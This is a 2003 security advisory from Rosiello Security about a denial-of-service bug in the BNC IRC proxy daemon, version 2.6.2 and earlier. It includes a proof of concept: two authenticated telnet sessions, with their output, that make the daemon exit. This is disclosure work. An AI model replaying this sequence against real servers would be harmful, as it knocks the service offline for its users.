bnc version 2.6.2 and below suffers from a denial of service vulnerability. Armed with a valid login and password, a remote user can kill the daemon.
df9ba77e9a022c665d0476f11eddc0d54a32d3a4c2c210cd53987e9a5bed8326
vulnerabilities
------------------------------------------------------------------------
2003-05-26
BNC <= 2.6.2 DoS
Rosiello Security & DTORS Security
ADVISORY
http://www.rosiello.org
Denial of Service in bnc 2.6.2
February, 2003
I. BACKGROUND
BNC which is a acro for BouNCe is a daemon designed to allow some people who
do not have access to the net in general, but who do have access to another
pc that can reach the net, the ability to BouNCe though this pc to IRC.
BNC also satisfies as a host to allow users to Bounce through shells to IRC
thus allowing for many features such as an interresting internet address
commonly used for show or for benifits such as mild protection from commonly
used attacks such as DoS by covering a users real IP with that IP of a
machine more capable of handling these attacks.
II. DESCRIPTION
It is possible, for an user of the program, killing remotely the daemon, but
not executing arbitrary code.
III. ANALYSIS
Exploitation can provide the exit() of the program as follows.
Load two telnet sessions.
FISRT SESSION:
[angelo@rosiello.org]$ telnet 127.0.0.1 32986
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
user first first first first
nick boom ~
NOTICE AUTH :You need to say /quote PASS
PASS temp123
NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy
NOTICE AUTH :Level two, lets connect to something real now
NOTICE AUTH :type /quote conn [server] to connect
NOTICE AUTH :type /quote help for basic list of commands and usage
SECOND SESSION:
[angelo@rosiello.org]$ telnet 127.0.0.1 32986
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
user second second second second
nick boom
NOTICE AUTH :You need to
say /quote PASS
PASS temp123
NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy
NOTICE AUTH :Level two, lets connect to something real now
NOTICE AUTH :type /quote conn [server] to connect
NOTICE AUTH :type /quote help for basic list of commands and usage
quit
Connection closed by foreign host.
NOW close the first session too...
quit..
(gdb)Program exited with code 010.
The password must be the right one! (the user must be real).
The daemon will die.
IV. DETECTION
bnc2.6.2 is vulnerable, latest versions are not.
The manteiner of the project was advised and He granted that the bug was
fixed in the latest versions.
VIII. CREDIT
Angelo Rosiello
http://www.rosiello.org
http://www.dtors.net
Software: